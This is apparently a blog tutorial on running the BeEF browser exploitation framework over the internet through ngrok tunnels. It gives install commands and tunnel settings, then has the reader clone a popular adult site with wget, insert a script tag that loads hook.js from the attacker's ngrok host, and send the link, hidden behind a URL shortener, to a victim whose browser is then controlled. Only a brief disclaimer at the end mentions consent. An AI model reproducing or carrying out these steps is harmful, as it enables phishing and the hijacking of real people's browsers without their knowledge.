Beef-xss over wan with custom page

Hi and welcome to hacking a rise two day we are going to be using beef-over-wan script this will let us use are beef-xss over the internet

what is beef

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. … BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

what is ngrok

Ngrok is a multiplatform tunnelling, reverse proxy software that establishes secure tunnels from a public endpoint such as internet to a locally running network service while capturing all traffic for detailed inspection and replay.

what is beef-over-wan

Browser Exploitation Framework is a Open-source penetration testing tool that focuses on browser-based vulnerabilities .This Python Script does the changes Required to make hooked Linked Accessible Over WAN .So anyone can use this framework and Attack Over WAN without Port Forwarding [NGROK or any Localhost to Webhost Service Required

installing

git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
cd BeeF-Over-Wan
chmod +x BeeFOverWan.py && python BeeFOverWan.py

NGROK Steps
STEP 1 : Add these Lines To ngrok.yml [Location .ngrok2/ngrok.yml ]
tunnels:
first-app:
addr: 80
proto: http
second-app:
addr: 3000
proto: http
STEP 2 : Now Start ngrok with :
ngrok start –all
STEP 3 : You will See 2 different links Forwarded to
Localhost:80 [ Link To be Sent to Victim ]
Localhost:3000 [ Your Link will be Connecting to.. ]
STEP 4 : Enter these links in Script and Follow The Steps given in Script.

Requirements
Beef-xss [Browser Exploitation Framework]
Apache
NGROK [If you want to do this without Port Forwarding]

right now we got that out the way we can now start Beef-over-wan so open a terminal and type ngrok start --all

now we start beef-over-wan and the apache2 server so open a terminal and type service apache2 start then cd BeeF-Over-Wan and then python BeeFOverWan.py

now we press 0 and then enter this will show us the ngrok settings if u didn’t already set them

now we hit enter and it ask us to gave the ngrok link we wanna send to the target so we use the one thats running on port 80 in my case its 2504e17a.ngrok.io so i copy it with out the http and pasted it in to the terminal and hit enter

now we add the url for panel to connect to so the url running on port 3000 we wanna copy the url in my case its 7a77ef5a.ngrok.io so we copy and pasted it in

now we are with few secs it and u see this pop up

now copy the link for the panel and paste in to firefox my link is https://7a77ef5a.ngrok.io/ui/authentication this take you to the login page of beef-xss

now we log in the default password and username is beef for both when u log in u are greeted with this page

now we minimize the panel for beef-xss and open two terminals in both type cd /var/www/html now in one type nano beef.html and copy this script

"<"script" src="http"://2504e17a.ngrok.io:80/"hook.js">
"<"/script>"

now in the other terminal wget and the url you wanna clone for this im going to use pornhub.com as its the most stay on pornsites so gave us more chance keeping them hooked

Now we type ls and gedit index.html

it will open the index file in a text editor and we paste the “<"script src="http://2504e17a.ngrok.io:80/hook.js">
<"/script>” under the title in the file

now we send this url http://2504e17a.ngrok.io target and they click it they are hooked

now we can start making command on the targets browser but me i rader use a link shorter like bitly

Disclamer

dont use this for evil in other words dont use this with out the persons consent as i dont take responsibility for your actions

pentester
Hi im the laughing man im a pentester and the owner of Hacking a rise

Leave a Reply

Your email address will not be published. Required fields are marked *